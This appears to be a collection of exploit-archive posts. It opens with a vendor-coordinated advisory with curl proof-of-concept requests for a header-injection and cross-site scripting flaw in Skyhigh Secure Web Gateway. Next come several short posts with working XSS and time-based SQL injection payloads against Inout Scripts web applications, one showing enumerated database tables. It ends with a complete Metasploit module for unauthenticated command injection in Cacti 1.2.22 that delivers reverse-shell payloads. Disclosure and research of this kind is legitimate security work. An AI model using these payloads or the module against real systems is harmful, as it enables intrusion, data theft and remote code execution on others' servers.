<pre><code>RedTeam Pentesting identified a vulnerability which allows attackers to<br />craft URLs to any third-party website that result in arbitrary content<br />to be injected into the response when accessed through the Secure Web<br />Gateway. While it is possible to inject arbitrary content types, the<br />primary risk arises from JavaScript code allowing for cross-site<br />scripting.<br /><br /><br />Details<br />=======<br /><br />Product: Secure Web Gateway<br />Affected Versions: 10.2.11, potentially other versions<br />Fixed Versions: 10.2.17, 11.2.6, 12.0.1<br />Vulnerability Type: Cross-Site Scripting<br />Security Risk: high<br />Vendor URL: https://www.skyhighsecurity.com/en-us/products/secure-web-gateway.html<br />Vendor Status: fixed version released<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-002<br />Advisory Status: published<br />CVE: CVE-2023-0214<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0214<br /><br /><br />Introduction<br />============<br /><br />"Skyhigh Security Secure Web Gateway (SWG) is the intelligent,<br />cloud-native web security solution that connects and secures your<br />workforce from malicious websites and cloud apps—from anywhere, any<br />application, and any device."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />The Secure Web Gateway's (SWG) block page, which is displayed when a<br />request or response is blocked by a rule, can contain static files such<br />as images, stylesheets or JavaScript code. These files are embedded<br />using special URL paths. Consider the following excerpt of a block page:<br /><br />------------------------------------------------------------------------<br /><html><br /><!-- FileName: index.html<br /> Language: [en]<br />--><br /><!--Head--><br /><head><br /> <meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><br /> <meta http-equiv="X-UA-Compatible" content="IE=7" /><br /> <title>McAfee Web Gateway - Notification</title><br /> <script src="/mwg-internal/de5fs23hu73ds/files/javascript/sw.js" type="text/javascript" ></script><br /> <link rel="stylesheet" href="/mwg-internal/de5fs23hu73ds/files/default/stylesheet.css" /><br /></head><br />------------------------------------------------------------------------<br /><br />Static content is loaded from URL paths prefixed with<br />"/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this<br />prefix are intercepted and directly handled by the SWG no matter on<br />which domain they are accessed. While the prefix can be configured in<br />the SWG, attackers can also obtain it using another currently<br />undisclosed vulnerability.<br /><br />By reverse engineering the file "libSsos.so" and analysing JavaScript<br />code, it was possible to derive the API of the "Ssos" plugin's<br />"SetLoginToken" action. Through the following call using the<br />command-line HTTP client curl, the behaviour of the plugin was further<br />analysed:<br /><br />------------------------------------------------------------------------<br />$ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p'<br />HTTP/1.0 200 OK<br />P3P: p<br />Connection: Keep-Alive<br />Set-Cookie: MwgSso=v; Path=/; Max-Age=240;<br />Content-Type: application/javascript<br />Content-Length: 2<br />X-Frame-Options: deny<br /><br />c;<br />------------------------------------------------------------------------<br /><br />The response embeds the values of the three URL parameters "v", "c" and<br />"p". The value for "p" is embedded as value of the "P3P" header, the<br />value of "c" as the response body and the value of "v" as the value<br />of the cookie "MwgSso".<br /><br />It is also possible to include newline or carriage return characters in<br />the parameter value which are not encoded in the output. Consequently,<br />if the value of the parameter "p" contains a line break, arbitrary<br />headers can be injected. If two line breaks follow, an arbitrary body<br />can be injected. If a suitable "Content-Length" header is injected, the<br />remaining headers and body of the original response will be ignored by<br />the browser. This means that apart from the initial "P3P" header, an<br />arbitrary response can be generated. For example, a page containing<br />JavaScript code could be returned, resulting in a cross-site scripting<br />attack.<br /><br />Consequently, attackers can construct URL paths that can be appended to<br />any domain and cause an arbitrary response to be returned if the URL is<br />accessed through the SWG. This could be exploited by distributing such<br />URLs or even by offering a website which performs an automatic redirect<br />to any other website using such a URL. As a result, the SWG exposes its<br />users to self-induced cross-site scripting vulnerabilities in any<br />website.<br /><br /><br />Proof of Concept<br />================<br /><br />In the following request, the "p" parameter is used to inject suitable<br />"Content-Type" and "Content-Length" headers, as well as an arbitrary<br />HTML response body.<br /><br />------------------------------------------------------------------------<br />$ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a<h1>RedTeam Pentesting</h1>'<br />HTTP/1.0 200 OK<br />P3P: p<br />Content-Type: text/html<br />Content-Length: 27<br /><br /><h1>RedTeam Pentesting</h1><br />------------------------------------------------------------------------<br /><br />As mentioned above, the HTTP response body could also include JavaScript<br />code designed to interact with the domain specified in the URL resulting<br />in a cross-site scripting vulnerability.<br /><br /><br />Workaround<br />==========<br /><br />None.<br /><br /><br />Fix<br />===<br /><br />According to the vendor, the vulnerability is mitigated in versions<br />10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not<br />verified by RedTeam Pentesting GmbH. The vendor's security bulletin can<br />be found at the following URL:<br /><br />https://kcm.trellix.com/corporate/index?page=content&id=SB10393<br /><br /><br />Security Risk<br />=============<br /><br />The vulnerability could be used to perform cross-site scripting attacks<br />against users of the SWG in context of any domain. Attackers only need<br />to convince users to open a prepared URL or visit an attacker's website<br />that could perform an automatic redirect to an exploit URL. This exposes<br />any website visited through the SWG to the various risks and<br />consequences of a cross-site scripting vulnerability such as account<br />takeover. As a result, this vulnerability poses a high risk.<br /><br /><br />Timeline<br />========<br /><br />2022-07-29 Vulnerability identified<br />2022-10-20 Customer approved disclosure to vendor<br />2022-10-20 Vulnerability was disclosed to the vendor<br />2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and<br /> 12.0.1.<br />2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH<br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://jobs.redteam-pentesting.de/<br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Alter Posthof 1 Fax : +49 241 510081-99<br />52062 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : inoutscripts.com │<br />│ Vendor : Inout Scripts - Nesote Technologies Private Limited │<br />│ Software : Inout Jobs Portal 2.2.2 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br />Method: GET<br /><br />URL parameter 'page' is vulnerable to XSS<br /><br />https://www.website.com/index.php?page=index%2findexyar11%3cimg%20src%3da%20onerror%3dalert(1)%3ex75a9<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : inoutscripts.com │<br />│ Vendor : Inout Scripts - Nesote Technologies Private Limited │<br />│ Software : Inout Jobs Portal 2.2.2 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company reputation │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php?page=jobs/searchresult<br /><br />Method: POST<br /><br />POST parameter 'loc_id' is vulnerable to SQLI<br /><br />+-----------------------------------------------------------+<br /><br />-----------------------------245625052541747605171577107419<br />Content-Disposition: form-data; name="search_query"<br /><br />web<br />-----------------------------245625052541747605171577107419<br />Content-Disposition: form-data; name="c_id"<br /><br />1<br />-----------------------------245625052541747605171577107419<br />Content-Disposition: form-data; name="loc_id"<br /><br />1[INJECT-HERE]<br />-----------------------------245625052541747605171577107419<br />Content-Disposition: form-data; name="serchtype"<br /><br />simple<br />-----------------------------245625052541747605171577107419<br />Content-Disposition: form-data; name="c_id"<br /><br />0<br />-----------------------------245625052541747605171577107419<br /><br />+-----------------------------------------------------------+<br /><br /><br />[INFO] the back-end DBMS is MySQL<br />back-end DBMS: MySQL >= 5.6<br />[INFO] fetching tables for database: '*****_jobs_portal'<br />Database: *****_jobs_portal<br />[53 tables]<br />+-----------------------------------------+<br />| nesote_inoutscripts_company_ratereview |<br />| nesote_inoutscripts_homepage_banner |<br />| nesote_inoutscripts_users |<br />| nesote_jobportal_admin |<br />| nesote_jobportal_applied_jobs |<br />| nesote_jobportal_city |<br />| nesote_jobportal_client_logs |<br />| nesote_jobportal_company_size |<br />| nesote_jobportal_company_type |<br />| nesote_jobportal_companyblock |<br />| nesote_jobportal_contents |<br />| nesote_jobportal_country |<br />| nesote_jobportal_coverletters |<br />| nesote_jobportal_currency |<br />| nesote_jobportal_email_templates |<br />| nesote_jobportal_employer_details |<br />| nesote_jobportal_employer_feedback |<br />| nesote_jobportal_functional_role |<br />| nesote_jobportal_industry |<br />| nesote_jobportal_ip_012023 |<br />| nesote_jobportal_ip_022020 |<br />| nesote_jobportal_ip_032020 |<br />| nesote_jobportal_ip_042020 |<br />| nesote_jobportal_ip_082021 |<br />| nesote_jobportal_ip_092022 |<br />| nesote_jobportal_ip_102022 |<br />| nesote_jobportal_ip_112022 |<br />| nesote_jobportal_ip_122022 |<br />| nesote_jobportal_ipn |<br />| nesote_jobportal_job_types |<br />| nesote_jobportal_jobs |<br />| nesote_jobportal_jobseeker_details |<br />| nesote_jobportal_languages |<br />| nesote_jobportal_locations |<br />| nesote_jobportal_messages |<br />| nesote_jobportal_months_messages |<br />| nesote_jobportal_news_and_events |<br />| nesote_jobportal_notifications |<br />| nesote_jobportal_packages |<br />| nesote_jobportal_payment_details |<br />| nesote_jobportal_previous_exp |<br />| nesote_jobportal_qualifications |<br />| nesote_jobportal_resumes |<br />| nesote_jobportal_saved_jobs |<br />| nesote_jobportal_saved_resumes |<br />| nesote_jobportal_seekers_qualifications |<br />| nesote_jobportal_sent_jobalerts |<br />| nesote_jobportal_settings |<br />| nesote_jobportal_skills |<br />| nesote_jobportal_specifications |<br />| nesote_jobportal_states |<br />| nesote_jobportal_success_story |<br />| nesote_jobportal_themes |<br />+-----------------------------------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : inoutscripts.com │<br />│ Vendor : Inout Scripts - Nesote Technologies Private Limited │<br />│ Software : Inout Music 5.1.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company reputation │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php?page=explore/search<br /><br />Method: POST<br /><br />POST parameter 'title' is vulnerable to SQLI<br /><br />---<br />Parameter: title (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: title=1' AND (SELECT 9844 FROM (SELECT(SLEEP(5)))scaa) AND 'tLOV'='tLOV<br />---<br /><br />POST parameter 'genre' is vulnerable to SQLI<br /><br />---<br />Parameter: genre (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: title=1&type=videoalbum&genre=1') AND (SELECT 3533 FROM (SELECT(SLEEP(5)))ENgP) AND ('MnKg'='MnKg&country=10<br />---<br /><br />POST parameter 'country' is vulnerable to SQLI<br /><br />---<br />Parameter: country (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: title=1&type=videoalbum&genre=1&country=10 AND (SELECT 4811 FROM (SELECT(SLEEP(5)))nDdo)<br />---<br /><br /><br />+-----------------------------------------------------------+<br /><br />POST /index.php?page=explore/search HTTP/2<br /><br /><br />-----------------------------116235583720082436942508111905<br />Content-Disposition: form-data; name="title"<br /><br />love[Inject-HERE]<br />-----------------------------116235583720082436942508111905<br />Content-Disposition: form-data; name="type"<br /><br />audioalbum<br />-----------------------------116235583720082436942508111905<br />Content-Disposition: form-data; name="genre"<br /><br />1[Inject-HERE]<br />-----------------------------116235583720082436942508111905<br />Content-Disposition: form-data; name="country"<br /><br />3[Inject-HERE]<br />-----------------------------116235583720082436942508111905--<br /><br />+-----------------------------------------------------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Cacti 1.2.22 unauthenticated command injection',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection<br /> vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in<br /> order to achieve unauthenticated remote code execution as the<br /> www-data user.<br /><br /> The module first attempts to obtain the Cacti version to see<br /> if the target is affected. If LOCAL_DATA_ID and/or HOST_ID<br /> are not set, the module will try to bruteforce the missing<br /> value(s). If a valid combination is found, the module will<br /> use these to attempt exploitation. If LOCAL_DATA_ID and/or<br /> HOST_ID are both set, the module will immediately attempt<br /> exploitation.<br /><br /> During exploitation, the module sends a GET request to<br /> /remote_agent.php with the action parameter set to polldata<br /> and the X-Forwarded-For header set to the provided value for<br /> X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the<br /> poller_id parameter is set to the payload and the host_id<br /> and local_data_id parameters are set to the bruteforced or<br /> provided values. If X_FORWARDED_FOR_IP is set to an address<br /> that is resolvable to a hostname in the poller table, and the<br /> local_data_id and host_id values are vulnerable, the payload<br /> set for poller_id will be executed by the target.<br /><br /> This module has been successfully tested against Cacti<br /> version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Stefan Schiller', # discovery (independent of Steven Seeley)<br /> 'Steven Seeley', # (mr_me) @steventseeley - discovery (independent of Stefan Schiller)<br /> 'Owen Gong', # @phithon_xg - vulhub PoC<br /> 'Erik Wynter' # @wyntererik - Metasploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-46169'],<br /> ['URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf'], # disclosure and technical details<br /> ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'], # vulhub vulnerable docker image and PoC<br /> ['URL', 'https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution'] # analysis by Stefan Schiller<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8080<br /> },<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'Automatic (Unix In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },<br /> 'Type' => :unix_memory<br /> }<br /> ],<br /> [<br /> 'Automatic (Linux Dropper)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'CmdStagerFlavor' => ['echo', 'printf', 'wget', 'curl'],<br /> 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2022-12-05',<br /> 'DefaultTarget' => 1,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'The base path to Cacti', '/']),<br /> OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']),<br /> OptInt.new('HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']),<br /> OptInt.new('LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.'])<br /> ])<br /><br /> register_advanced_options([<br /> OptInt.new('MIN_HOST_ID', [true, 'Lower value for the range of possible host_id values to check for', 1]),<br /> OptInt.new('MAX_HOST_ID', [true, 'Upper value for the range of possible host_id values to check for', 5]),<br /> OptInt.new('MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]),<br /> OptInt.new('MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100])<br /> ])<br /> end<br /><br /> def check<br /> # sanity check to see if the target is likely Cacti<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /><br /> unless res<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res.code == 200 && res.body.include?('<title>Login to Cacti')<br /> return CheckCode::Safe('Target is not a Cacti application.')<br /> end<br /><br /> # get the version<br /> version = res.body.scan(/Version (.*?) \| \(c\)/)&.flatten&.first<br /> if version.blank?<br /> return CheckCode::Detected('Could not determine the Cacti version: the HTTP response body did not match the expected format.')<br /> end<br /><br /> begin<br /> if Rex::Version.new(version) <= Rex::Version.new('1.2.22')<br /> return CheckCode::Appears("The target is Cacti version #{version}")<br /> else<br /> return CheckCode::Safe("The target is Cacti version #{version}")<br /> end<br /> rescue StandardError => e<br /> return CheckCode::Unknown("Failed to obtain a valid Cacti version: #{e}")<br /> end<br /> end<br /><br /> def exploitable_rrd_names<br /> [<br /> 'apache_total_kbytes',<br /> 'apache_total_hits',<br /> 'apache_total_hits',<br /> 'apache_total_kbytes',<br /> 'apache_cpuload',<br /> 'boost_avg_size',<br /> 'boost_peak_memory',<br /> 'boost_records',<br /> 'boost_table',<br /> 'ExportDuration',<br /> 'ExportGraphs',<br /> 'syslogRuntime',<br /> 'tholdRuntime',<br /> 'polling_time',<br /> 'uptime',<br /> ]<br /> end<br /><br /> def brute_force_ids<br /> # perform a sanity check first<br /> if @host_id<br /> host_ids = [@host_id]<br /> else<br /> if datastore['MAX_HOST_ID'] < datastore['MIN_HOST_ID']<br /> fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible')<br /> end<br /> host_ids = (datastore['MIN_HOST_ID']..datastore['MAX_HOST_ID']).to_a<br /> end<br /><br /> if @local_data_id<br /> local_data_ids = [@local_data_ids]<br /> else<br /> if datastore['MAX_LOCAL_DATA_ID'] < datastore['MIN_LOCAL_DATA_ID']<br /> fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible')<br /> end<br /> local_data_ids = (datastore['MIN_LOCAL_DATA_ID']..datastore['MAX_LOCAL_DATA_ID']).to_a<br /> end<br /><br /> # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id<br /> max_attempts = host_ids.length * local_data_ids.length<br /> if max_attempts > 1000<br /> fail_with(Failure::BadConfig, 'The number of possible HOST_ID and LOCAL_DATA_ID combinations exceeds 1000. Please limit this number by adjusting the MIN and MAX options for both parameters.')<br /> end<br /><br /> potential_targets = []<br /> request_ct = 0<br /><br /> print_status("Trying to bruteforce an exploitable host_id and local_data_id by trying up to #{max_attempts} combinations")<br /> host_ids.each do |h_id|<br /> print_status("Enumerating local_data_id values for host_id #{h_id}")<br /> local_data_ids.each do |ld_id|<br /> request_ct += 1<br /> print_status("Performing request #{request_ct}...") if request_ct % 25 == 0<br /><br /> res = send_request_cgi(remote_agent_request(ld_id, h_id, rand(1..1000)))<br /> unless res<br /> print_error('No response received. Aborting bruteforce')<br /> return nil<br /> end<br /><br /> unless res.code == 200<br /> print_error("Received unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce")<br /> return nil<br /> end<br /><br /> begin<br /> parsed_response = JSON.parse(res.body)<br /> rescue JSON::ParserError<br /> print_error("The response body is not in valid JSON format. This shouldn't happen. Aborting bruteforce")<br /> return nil<br /> end<br /><br /> unless parsed_response.is_a?(Array)<br /> print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")<br /> return nil<br /> end<br /><br /> # the array can be empty, which is not an error but just means the local_data_id is not exploitable<br /> next if parsed_response.empty?<br /><br /> first_item = parsed_response.first<br /> unless first_item.is_a?(Hash) && ['value', 'rrd_name', 'local_data_id'].all? { |key| first_item.keys.include?(key) }<br /> print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")<br /> return nil<br /> end<br /><br /> # some data source types that can be exploited have a valid rrd_name. these are included in the exploitable_rrd_names array<br /> # if we encounter one of these, we should assume the local_data_id is exploitable and try to exploit it<br /> # in addition, some data source types have an empty rrd_name but are still exploitable<br /> # however, if the rrd_name is blank, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it<br /> # instead of trying to exploit all potential targets of the latter category, let's just save these and print them at the end<br /> # then the user can try to exploit them manually by setting the HOST_ID and LOCAL_DATA_ID options<br /> rrd_name = first_item['rrd_name']<br /> if rrd_name.empty?<br /> potential_targets << [h_id, ld_id]<br /> elsif exploitable_rrd_names.include?(rrd_name)<br /> print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}")<br /> return [h_id, ld_id]<br /> else<br /> next # if we have a valid rrd_name but it's not in the exploitable_rrd_names array, we should move on<br /> end<br /> end<br /> end<br /><br /> return nil if potential_targets.empty?<br /><br /> # inform the user about potential targets<br /> print_warning("Identified #{potential_targets.length} host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:")<br /> potential_targets.each do |h_id, ld_id|<br /> print_line("\thost_id: #{h_id} - local_data_id: #{ld_id}")<br /> end<br /> print_status('You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options')<br /> nil<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # use base64 encoding to get around special char limitations<br /> cmd = "`echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/bash`"<br /> send_request_cgi(remote_agent_request(@local_data_id, @host_id, cmd), 0)<br /> end<br /><br /> def exploit<br /> @host_id = datastore['HOST_ID'] if datastore['HOST_ID'].present?<br /> @local_data_id = datastore['LOCAL_DATA_ID'] if datastore['LOCAL_DATA_ID'].present?<br /><br /> unless @host_id && @local_data_id<br /> brute_force_result = brute_force_ids<br /> unless brute_force_result<br /> fail_with(Failure::NoTarget, 'Failed to identify an exploitable host_id - local_data_id combination.')<br /> end<br /> @host_id, @local_data_id = brute_force_result<br /> end<br /><br /> if target.arch.first == ARCH_CMD<br /> print_status('Executing the payload. This may take a few seconds...')<br /> execute_command(payload.encoded)<br /> else<br /> execute_cmdstager(background: true)<br /> end<br /> end<br /><br /> def remote_agent_request(ld_id, h_id, poller_id)<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'remote_agent.php'),<br /> 'headers' => {<br /> 'X-Forwarded-For' => datastore['X_FORWARDED_FOR_IP']<br /> },<br /> 'vars_get' => {<br /> 'action' => 'polldata',<br /> 'local_data_ids[0]' => ld_id,<br /> 'host_id' => h_id,<br /> 'poller_id' => poller_id # when bruteforcing, this is a random number, but during exploitation this is the payload<br /> }<br /> }<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : inoutscripts.com │<br />│ Vendor : Inout Scripts - Nesote Technologies Private Limited │<br />│ Software : Inout Search Engine 10.1.3 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br />Method: GET<br /><br />URL parameter 'page' is vulnerable to XSS<br /><br />https://www.example.com/index.php?page=footer%2femailafriendlaten%3cimg%20src%3da%20onerror%3dalert(1)%3ef96cd<br /><br /><br />[-] Done<br /></code></pre>
